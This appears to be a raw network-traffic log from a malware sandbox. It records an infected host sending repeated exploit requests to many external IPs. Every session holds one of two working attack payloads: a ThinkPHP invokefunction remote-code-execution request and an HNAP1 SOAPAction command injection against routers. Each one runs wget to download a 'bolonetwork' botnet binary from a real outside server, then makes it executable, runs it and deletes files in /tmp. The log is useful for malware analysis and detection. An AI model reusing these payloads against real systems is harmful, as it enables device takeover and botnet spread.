                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                69192.168.2.143911495.243.3.18080
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.634717941 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                70192.168.2.1439766154.164.49.1488081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.635068893 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.2.144161495.12.251.22180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.640240908 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.2.1451488114.235.217.1768081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.640805960 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.2.145717695.7.161.20780
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.644813061 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.2.1450110197.160.53.2468081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.645445108 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.145064895.207.149.10580
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.649369001 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.145259699.244.224.18081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.649976015 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.143567495.220.243.6180
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.654625893 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.143460235.119.194.718081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.655122995 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.143769495.246.233.11880
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.659540892 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.144209064.11.70.1898081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.660185099 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.146025095.211.239.13080
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.664475918 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.145035290.90.218.178081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.664882898 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.144655695.106.187.13980
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.669431925 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.145077489.204.254.1428081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.669806004 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
                                                Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.144869295.171.109.24280
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.674568892 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                                Connection: keep-alive
                                                Accept-Encoding: gzip, deflate
                                                Accept: /
                                                User-Agent: Bulu/2.0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.143443680.161.237.2458081
                                                TimestampBytes transferredDirectionData
                                                Jul 20, 2024 23:05:33.675035954 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                                Content-Type: text/xml; charset="utf-8"
                                                SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                                Content-Length: 640
